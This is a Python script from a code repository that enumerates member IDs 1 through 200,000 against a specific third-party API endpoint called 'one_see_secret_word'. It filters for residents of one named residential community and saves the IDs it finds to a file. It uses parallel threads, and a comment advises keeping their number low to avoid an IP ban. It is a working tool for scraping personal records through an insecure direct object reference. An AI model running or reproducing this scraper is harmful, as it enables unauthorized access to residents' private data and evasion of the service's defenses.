Files
miniapp_qr_portable_bundle/scan_village.py
Logic 29d1ad71ab
Some checks failed
docker-cicd / build-and-push (push) Failing after 16s
Initial commit
2026-03-21 18:47:00 +08:00

66 lines
2.3 KiB
Python

import json
import urllib.request
import concurrent.futures
from datetime import datetime
# 配置参数
API_URL = "https://jsh.szsentry.com/api//mine/one_see_secret_word"
TARGET_VILLAGE = "兆景华庭青年社区"
RANGE_START = 1
RANGE_END = 200000
MAX_THREADS = 15 # 线程数,建议不要开太大以免被封 IP
OUTPUT_FILE = "found_ids.txt"
def check_id(member_id):
"""请求单个 ID 并检查社区名称"""
body = json.dumps({"member_id": member_id}).encode()
req = urllib.request.Request(
API_URL,
data=body,
headers={"Content-Type": "application/json"},
method="POST",
)
try:
with urllib.request.urlopen(req, timeout=5) as resp:
data = json.loads(resp.read().decode("utf-8"))
if data.get("status") == 200:
village = data.get("data", {}).get("village_name")
if village == TARGET_VILLAGE:
return member_id, village
except Exception:
# 忽略超时、网络错误或 404 等
pass
return None
def main():
print(f"开始扫描 ID {RANGE_START}{RANGE_END}...")
print(f"目标社区: {TARGET_VILLAGE}")
found_count = 0
# 使用线程池加速
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
# 提交任务
future_to_id = {executor.submit(check_id, i): i for i in range(RANGE_START, RANGE_END + 1)}
with open(OUTPUT_FILE, "a", encoding="utf-8") as f:
for i, future in enumerate(concurrent.futures.as_completed(future_to_id)):
result = future.result()
if result:
mid, vname = result
found_count += 1
output_str = f"ID: {mid} | Village: {vname}\n"
print(f"\n[!] 发现匹配: {output_str.strip()}")
f.write(output_str)
f.flush() # 确保实时写入硬盘
# 每 100 个打印一次进度
if i % 100 == 0:
print(f"\r当前进度: {i}/{RANGE_END - RANGE_START + 1}", end="")
print(f"\n扫描完成!共发现 {found_count} 个匹配项,结果已保存至 {OUTPUT_FILE}")
if __name__ == "__main__":
main()